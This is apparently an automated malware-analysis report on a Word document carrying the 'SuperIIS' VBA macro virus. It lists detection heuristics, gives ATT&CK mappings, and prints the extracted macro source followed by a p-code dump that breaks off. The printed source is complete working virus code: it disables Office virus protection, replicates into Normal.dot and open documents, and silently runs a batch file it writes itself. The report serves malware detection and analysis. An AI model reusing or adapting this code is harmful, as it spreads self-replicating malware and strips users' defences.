MALICIOUS
356
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Word document containing VBA macros. The AutoOpen macro is designed to execute a payload using the Shell() function, which is a critical finding. The script attempts to read system information and execute a batch file, indicating a downloader or initial execution stage for further malicious activity. The presence of legacy WordBasic macro virus markers and ClamAV detections further support its malicious nature.
Heuristics 8
-
ClamAV: Doc.Trojan.IIS-19 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.IIS-19
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
a = Shell(windir & "\System\lo.bat", 0) -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
FullCodeN = "Sub AutoClose()" & Chr(13) -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45199 bytes |
SHA-256: ecb1f1b7eaca12e3d88729d9e3c57cb38b15be8e38171ee789c1132619c30d7e |
|||
|
Detection
ClamAV:
Doc.Trojan.IIS-12
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Sub AutoOpen()
'On Error GoTo eb
'MyName=SuperIISv1.1
a = Dir(NormalTemplate.FullName)
If a = "" Then GoTo NoSet
SetAttr NormalTemplate.FullName, vbNormal
NoSet:
Call Flitnic
eb:
End Sub
Sub ViewVbCode()
On Error GoTo NoDoc
a = Dir(NormalTemplate.FullName)
If a = "" Then GoTo NoSet
SetAttr (NormalTemplate.FullName), vbNormal
NoSet:
Close #1
Open "c:\msdos.sys" For Input As #1
Do Until EOF(1)
Line Input #1, a
If Left(UCase(a), 7) = "WINDIR=" Then
l = Len(a)
windir = Mid(a, 8, l)
End If
Loop
Close #1
If windir = "" Then Exit Sub
'Clean Activedocument:
ms = ActiveDocument.VBProject.VBComponents.Count
For t = 1 To ms
ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines
If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1)
If UCase(l) = "'MYNAME=SUPERIISV1.1" Then
Acd = 1
Exit For
End If
Next t
a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines
ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a
ActiveDocument.Saved = True
NoDoc:
'Clean NormalTemplate:
ms = NormalTemplate.VBProject.VBComponents.Count
For t2 = 2 To ms
ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines
If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1)
If UCase(l) = "'MYNAME=SUPERIISV1.1" Then
NormT = 1
Exit For
End If
Next t2
FileCopy windir & "\System\lo.sys", "c:\Troop.dat"
a = Shell(windir & "\System\lo.bat", 0)
For i = 1 To 2
al = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines
NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, al
Next i
esub:
eb:
Application.ShowVisualBasicEditor = True
NoDocL:
Options.SaveNormalPrompt = False
NormalTemplate.Saved = True
End Sub
Sub ToolsMacro()
On Error GoTo NoDoc
a = Dir(NormalTemplate.FullName)
If a = "" Then GoTo NoSet
SetAttr (NormalTemplate.FullName), vbNormal
NoSet:
'Save ActiveDocument:
ms = ActiveDocument.VBProject.VBComponents.Count
For t = 1 To ms
ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines
If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1)
If UCase(l) = "'MYNAME=SUPERIISV1.1" Then
Acd = 1
Exit For
End If
Next t
If Acd = 1 Then
FullCodeD = "Sub AutoOpen" & Chr(13)
FullCodeN = "Sub AutoClose()" & Chr(13)
a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines
For ii = 2 To a
l = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.Lines(ii, 1)
FullCodeN = FullCodeN & l & Chr(13)
FullCodeD = FullCodeD & l & Chr(13)
Next ii
End If
'Clean Activedocument:
a = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines
ActiveDocument.VBProject.VBComponents(t).CodeModule.deletelines 1, a
ActiveDocument.Saved = True
ActiveDocument.Saved = True
NoDoc:
'Save NormalTemplate:
ms = NormalTemplate.VBProject.VBComponents.Count
For t2 = 1 To ms
ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines
If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1)
If UCase(l) = "'MYNAME=SUPERIISV1.1" Then
NormT = 1
Exit For
End If
Next t2
If NormT = 1 Then
FullCodeD = "Sub AutoOpen()" & Chr(13)
FullCodeN = "Sub AutoClose()" & Chr(13)
a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines
For iiii = 2 To a
l = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.Lines(iiii, 1)
FullCodeD = FullCodeD & l & Chr(13)
FullCodeN = FullCodeN & l & Chr(13)
Next iiii
End If
'Clean NormalTemplate:
l = ""
On Error GoTo 0
On Error GoTo eb
a = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines
NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, a
NormalTemplate.Saved = True
esub:
Close #1
Open "c:\msdos.sys" For Input As #1
Do Until EOF(1)
Line Input #1, a
If Left(UCase(a), 7) = "WINDIR=" Then
l = Len(a)
windir = Mid(a, 8, l)
End If
Loop
Close #1
If windir = "" Then Exit Sub
a = GetAttr(NormalTemplate.FullName)
If a = 33 Then a = 1
If a = 1 Then GoTo eb
eb:
NormalTemplate.Saved = True
Application.Dialogs(wdDialogToolsMacro).Show
ReInf = True
If Application.ShowVisualBasicEditor = True Then ReInf = False
Reinfection:
If ReInf = True Then
'Reinfection:
Acd = 0
NormT = 0
If NormT <> 1 Then
NormalTemplate.OpenAsDocument
NormAt = ActiveDocument.ReadOnly
ActiveDocument.Close
Close #1
look:
ms = NormalTemplate.VBProject.VBComponents.Count
For inn = 2 To ms
a = NormalTemplate.VBProject.VBComponents(inn).CodeModule.countoflines
If a < 1 Then
NormalTemplate.VBProject.VBComponents(inn).CodeModule.AddFromstring (FullCodeN)
i = 20
Exit For
End If
Next inn
If i <> 20 Then
Close #1
a = Dir(windir & "\System\Flitnic.drv")
If a <> "" Then Kill windir & "\system\Flitnic.drv"
Close #1
Open windir & "\System\Flitnic.drv" For Append As #1
Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34)
Close #1
NormalTemplate.VBProject.VBComponents.Import windir & "\System\Flitnic.drv"
GoTo look
End If
a = Dir(NormalTemplate.FullName)
If a = "" Then GoTo notemp
If NormAt = True Then
NormalTemplate.Saved = True
End If
End If
i = 1
If NormAt <> True Then NormalTemplate.Save
notemp:
If Acd <> 1 Then
Close
look2:
a = Application.Documents.Count
If a < 1 Then GoTo NoDocL
ms = ActiveDocument.VBProject.VBComponents.Count
For inn2 = 2 To ms
a = ActiveDocument.VBProject.VBComponents(inn2).CodeModule.countoflines
If a < 1 Then
ActiveDocument.VBProject.VBComponents(inn2).CodeModule.AddFromstring (FullCodeD)
i = 20
Exit For
End If
Next inn2
If i <> 20 Then
Close #1
a = Dir(windir & "\System\Flitnic.drv")
If a <> "" Then Kill windir & "\system\Flitnic.drv"
Close #1
Open windir & "\System\Flitnic.drv" For Append As #1
Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34)
Close #1
ActiveDocument.VBProject.VBComponents.Import windir & "\System\Flitnic.drv"
GoTo look2
End If
If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then
If ActiveDocument.ReadOnly = True Then GoTo noactsave
ActiveDocument.Save
noactsave:
Else
ActiveDocument.Saved = True
End If
End If
NoDocL:
Else
FileCopy windir & "\System\lo.sys", "c:\Troop.dat"
a = Shell(windir & "\System\lo.bat", 0)
For i = 1 To 2
al = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines
NormalTemplate.VBProject.VBComponents(t2).CodeModule.deletelines 1, al
NormalTemplate.Saved = True
Next i
End If
Options.SaveNormalPrompt = False
NormalTemplate.Saved = True
End Sub
Sub Flitnic()
Begin:
On Error GoTo eb
NormAt = False
VBE.CommandBars("Edit").Controls(1).Enabled = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Close #1
Open "c:\msdos.sys" For Input As #1
Do Until EOF(1)
Line Input #1, a
If Left(UCase(a), 7) = "WINDIR=" Then
l = Len(a)
windir = Mid(a, 8, l)
End If
Loop
If windir = "" Then Exit Sub
On Error GoTo NoInf
ms = ActiveDocument.VBProject.VBComponents.Count
For t = 1 To ms
ls = ActiveDocument.VBProject.VBComponents(t).CodeModule.countoflines
If ls > 3 Then l = ActiveDocument.VBProject.VBComponents(t).CodeModule.Lines(3, 1)
If UCase(l) = "'MYNAME=SUPERIISV1.1" Then
Acd = 1
Exit For
End If
Next t
If Acd = 1 Then
FullCodeN = "Sub AutoClose()" & Chr(13)
a = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.countoflines
For ii = 2 To a
l = ActiveDocument.VBProject.VBComponents.Item(t).CodeModule.Lines(ii, 1)
FullCodeN = FullCodeN & l & Chr(13)
Next ii
End If
ms = NormalTemplate.VBProject.VBComponents.Count
For t2 = 1 To ms
ls = NormalTemplate.VBProject.VBComponents(t2).CodeModule.countoflines
If ls > 3 Then l = NormalTemplate.VBProject.VBComponents(t2).CodeModule.Lines(3, 1)
If UCase(l) = "'MYNAME=SUPERIISV1.1" Then
NormT = 1
Exit For
End If
Next t2
If NormT = 1 Then
FullCodeD = "Sub AutoOpen()" & Chr(13)
a = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.countoflines
For iiii = 2 To a
l = NormalTemplate.VBProject.VBComponents.Item(t2).CodeModule.Lines(iiii, 1)
FullCodeD = FullCodeD & l & Chr(13)
Next iiii
End If
If NormT <> 1 Then
look:
ms = NormalTemplate.VBProject.VBComponents.Count
For inn = 2 To ms
a = NormalTemplate.VBProject.VBComponents(inn).CodeModule.countoflines
If a < 1 Then
NormalTemplate.VBProject.VBComponents(inn).CodeModule.AddFromstring (FullCodeN)
i = 20
Exit For
End If
Next inn
If i <> 20 Then
Close #1
a = Dir(windir & "\System\Flitnic.drv")
If a <> "" Then Kill windir & "\system\Flitnic.drv"
Close #1
Open windir & "\System\Flitnic.drv" For Append As #1
Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34)
Close #1
NormalTemplate.VBProject.VBComponents.Import windir & "\System\Flitnic.drv"
GoTo look
End If
a = Dir(windir & "\System\lo.sys")
If a <> "" Then Kill windir & "\System\lo.sys"
NormalTemplate.OpenAsDocument
NormAtt = ActiveDocument.ReadOnly
l = ""
On Error GoTo eb
ActiveDocument.SaveAs FileName:=windir & "\System\lo.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
NormalTemplate.Saved = True
ActiveDocument.Saved = True
ActiveDocument.Close
Close #1
a = Dir(windir & "\System\lo.bat")
If a <> "" Then Kill windir & "\System\lo.bat"
Close
Open windir & "\System\lo.bat" For Append As #1
Print #1, ":Begin"
l = Len(NormalTemplate.FullName)
l = l - 10
For i = 1 To 500
Print #1, "rem Flitnic has catched you... he, he"
Next i
Print #1, ":Begin"
Print #1, "Move /y c:\Troop.dat " & NormalTemplate.FullName
Print #1, "If exist c:\Troop.dat goto Begin"
Close #1
NormalTemplate.Saved = True
a = Dir(NormalTemplate.FullName)
If a = "" Then GoTo notemp
If NormAt = True Then
End If
notemp:
End If
i = 1
If Acd <> 1 Then
Close
look2:
ms = ActiveDocument.VBProject.VBComponents.Count
For inn2 = 2 To ms
a = ActiveDocument.VBProject.VBComponents(inn2).CodeModule.countoflines
If a < 1 Then
ActiveDocument.VBProject.VBComponents(inn2).CodeModule.AddFromstring (FullCodeD)
i = 20
Exit For
End If
Next inn2
If i <> 20 Then
Close #1
a = Dir(windir & "\System\Flitnic.drv")
If a <> "" Then Kill windir & "\system\Flitnic.drv"
Close #1
Open windir & "\System\Flitnic.drv" For Append As #1
Print #1, "Attribute VB_Name = " & Chr(34) & "Modul1" & Chr(34)
Close #1
ActiveDocument.VBProject.VBComponents.Import windir & "\System\Flitnic.drv"
GoTo look2
End If
If UCase(Left(ActiveDocument.FullName, 1)) <> "A" And Mid(ActiveDocument.FullName, 3, 1) = "\" Then
If ActiveDocument.ReadOnly = True Then GoTo noactsave
ActiveDocument.Save
noactsave:
Else
ActiveDocument.Saved = True
End If
End If
NoInf:
eb:
a = Dir(NormalTemplate.FullName)
If a = "" Then
NormalTemplate.Saved = False
GoTo NoNormal
End If
If NormAtt = True Then
FileCopy windir & "\System\lo.sys", "c:\Troop.dat"
SetAttr (NormalTemplate.FullName), vbNormal
a = Shell(windir & "\System\lo.bat", 0)
Else
NormalTemplate.Save
End If
NormalTemplate.Saved = True
'First ever used this kind of Stealth. Infects Normal.Dot when
'it's ReadOnly too (immediatly, the first time you load an infected
'Document
'Written by Flitnic, member of [S o S] No Payload included yet!
NoNormal:
End Sub
' Processing file: /tmp/qstore_m2uf8x5x
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Modul1 - 18905 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' QuoteRem 0x0000 0x0010 "On Error GoTo eb"
' Line #2:
' QuoteRem 0x0000 0x0013 "MyName=SuperIISv1.1"
' Line #3:
' Ld NormalTemplate
' MemLd FullName
' ArgsLd Dir 0x0001
' St a
' Line #4:
' Ld a
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo NoSet
' EndIf
' Line #5:
' Ld NormalTemplate
' MemLd FullName
' Ld vbNormal
' ArgsCall SetAttr 0x0002
' Line #6:
' Label NoSet
' Line #7:
' ArgsCall (Call) Flitnic 0x0000
' Line #8:
' Label eb
' Line #9:
' EndSub
' Line #10:
' FuncDefn (Sub ViewVbCode())
' Line #11:
' OnError NoDoc
' Line #12:
' Ld NormalTemplate
' MemLd FullName
' ArgsLd Dir 0x0001
' St a
' Line #13:
' Ld a
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo NoSet
' EndIf
' Line #14:
' Ld NormalTemplate
' MemLd FullName
' Paren
' Ld vbNormal
' ArgsCall SetAttr 0x0002
' Line #15:
' Label NoSet
' Line #16:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #17:
' LitStr 0x000C "c:\msdos.sys"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #18:
' LitDI2 0x0001
' ArgsLd EOF 0x0001
' DoUnitil
' Line #19:
' LitDI2 0x0001
' Ld a
' LineInput
' Line #20:
' Ld a
' ArgsLd UCase 0x0001
' LitDI2 0x0007
' ArgsLd LBound 0x0002
' LitStr 0x0007 "WINDIR="
' Eq
' IfBlock
' Line #21:
' Ld a
' FnLen
' St l
' Line #22:
' Ld a
' LitDI2 0x0008
' Ld l
' ArgsLd Mid$ 0x0003
' St windir
' Line #23:
' EndIfBlock
' Line #24:
' Loop
' Line #25:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #26:
' Ld windir
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' ExitSub
' EndIf
' Line #27:
' QuoteRem 0x0000 0x0015 "Clean Activedocument:"
' Line #28:
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St ms
' Line #29:
' StartForVariable
' Ld t
' EndForVariable
' LitDI2 0x0001
' Ld ms
' For
' Line #30:
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' St ls
' Line #31:
' Ld ls
' LitDI2 0x0003
' Gt
' If
' BoSImplicit
' LitDI2 0x0003
' LitDI2 0x0001
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St l
' EndIf
' Line #32:
' Ld l
' ArgsLd UCase 0x0001
' LitStr 0x0014 "'MYNAME=SUPERIISV1.1"
' Eq
' IfBlock
' Line #33:
' LitDI2 0x0001
' St Acd
' Line #34:
' ExitFor
' Line #35:
' EndIfBlock
' Line #36:
' StartForVariable
' Ld t
' EndForVariable
' NextVar
' Line #37:
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd countoflines
' St a
' Line #38:
' LitDI2 0x0001
' Ld a
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall deletelines 0x0002
' Line #39:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #40:
' Label NoDoc
' Line #41:
' QuoteRem 0x0000 0x0015 "Clean NormalTemplate:"
' Line #42:
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St ms
' Line #43:
' StartForVariable
' Ld t2
' EndForVariable
' LitDI2 0x0002
' Ld ms
' For
' Line #44:
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' St ls
' Line #45:
' Ld ls
' LitDI2 0x0003
' Gt
' If
' BoSImplicit
' LitDI2 0x0003
' LitDI2 0x0001
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St l
' EndIf
' Line #46:
' Ld l
' ArgsLd UCase 0x0001
' LitStr 0x0014 "'MYNAME=SUPERIISV1.1"
' Eq
' IfBlock
' Line #47:
' LitDI2 0x0001
' St NormT
' Line #48:
' ExitFor
' Line #49:
' EndIfBlock
' Line #50:
' StartForVariable
' Ld t2
' EndForVariable
' NextVar
' Line #51:
' Ld windir
' LitStr 0x000E "\System\lo.sys"
' Concat
' LitStr 0x000C "c:\Troop.dat"
' ArgsCall FileCopy 0x0002
' Line #52:
' Ld windir
' LitStr 0x000E "\System\lo.bat"
' Concat
' LitDI2 0x0000
' ArgsLd Shell 0x0002
' St a
' Line #53:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0002
' For
' Line #54:
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' St al
' Line #55:
' LitDI2 0x0001
' Ld al
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall deletelines 0x0002
' Line #56:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #57:
' Label esub
' Line #58:
' Label eb
' Line #59:
' LitVarSpecial (True)
' Ld Application
' MemSt ShowVisualBasicEditor
' Line #60:
' Label NoDocL
' Line #61:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #62:
' LitVarSpecial (True)
' Ld NormalTemplate
' MemSt Saved
' Line #63:
' EndSub
' Line #64:
' FuncDefn (Sub ToolsMacro())
' Line #65:
' OnError NoDoc
' Line #66:
' Ld NormalTemplate
' MemLd FullName
' ArgsLd Dir 0x0001
' St a
' Line #67:
' Ld a
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo NoSet
' EndIf
' Line #68:
' Ld NormalTemplate
' MemLd FullName
' Paren
' Ld vbNormal
' ArgsCall SetAttr 0x0002
' Line #69:
' Label NoSet
' Line #70:
' QuoteRem 0x0000 0x0014 "Save ActiveDocument:"
' Line #71:
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St ms
' Line #72:
' StartForVariable
' Ld t
' EndForVariable
' LitDI2 0x0001
' Ld ms
' For
' Line #73:
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' St ls
' Line #74:
' Ld ls
' LitDI2 0x0003
' Gt
' If
' BoSImplicit
' LitDI2 0x0003
' LitDI2 0x0001
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St l
' EndIf
' Line #75:
' Ld l
' ArgsLd UCase 0x0001
' LitStr 0x0014 "'MYNAME=SUPERIISV1.1"
' Eq
' IfBlock
' Line #76:
' LitDI2 0x0001
' St Acd
' Line #77:
' ExitFor
' Line #78:
' EndIfBlock
' Line #79:
' StartForVariable
' Ld t
' EndForVariable
' NextVar
' Line #80:
' Ld Acd
' LitDI2 0x0001
' Eq
' IfBlock
' Line #81:
' LitStr 0x000C "Sub AutoOpen"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St FullCodeD
' Line #82:
' LitStr 0x000F "Sub AutoClose()"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St FullCodeN
' Line #83:
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd countoflines
' St a
' Line #84:
' StartForVariable
' Ld ii
' EndForVariable
' LitDI2 0x0002
' Ld a
' For
' Line #85:
' Ld ii
' LitDI2 0x0001
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St l
' Line #86:
' Ld FullCodeN
' Ld l
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St FullCodeN
' Line #87:
' Ld FullCodeD
' Ld l
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St FullCodeD
' Line #88:
' StartForVariable
' Ld ii
' EndForVariable
' NextVar
' Line #89:
' EndIfBlock
' Line #90:
' QuoteRem 0x0000 0x0015 "Clean Activedocument:"
' Line #91:
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' St a
' Line #92:
' LitDI2 0x0001
' Ld a
' Ld t
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemCall deletelines 0x0002
' Line #93:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #94:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #95:
' Label NoDoc
' Line #96:
' QuoteRem 0x0000 0x0014 "Save NormalTemplate:"
' Line #97:
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St ms
' Line #98:
' StartForVariable
' Ld t2
' EndForVariable
' LitDI2 0x0001
' Ld ms
' For
' Line #99:
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' MemLd countoflines
' St ls
' Line #100:
' Ld ls
' LitDI2 0x0003
' Gt
' If
' BoSImplicit
' LitDI2 0x0003
' LitDI2 0x0001
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St l
' EndIf
' Line #101:
' Ld l
' ArgsLd UCase 0x0001
' LitStr 0x0014 "'MYNAME=SUPERIISV1.1"
' Eq
' IfBlock
' Line #102:
' LitDI2 0x0001
' St NormT
' Line #103:
' ExitFor
' Line #104:
' EndIfBlock
' Line #105:
' StartForVariable
' Ld t2
' EndForVariable
' NextVar
' Line #106:
' Ld NormT
' LitDI2 0x0001
' Eq
' IfBlock
' Line #107:
' LitStr 0x000E "Sub AutoOpen()"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St FullCodeD
' Line #108:
' LitStr 0x000F "Sub AutoClose()"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' St FullCodeN
' Line #109:
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd countoflines
' St a
' Line #110:
' StartForVariable
' Ld iiii
' EndForVariable
' LitDI2 0x0002
' Ld a
' For
' Line #111:
' Ld iiii
' LitDI2 0x0001
' Ld t2
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' St l
' Line #112:
' Ld FullCodeD
' Ld l
' Concat
' LitDI2 0x000D
' ArgsLd Chr 0x0001
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.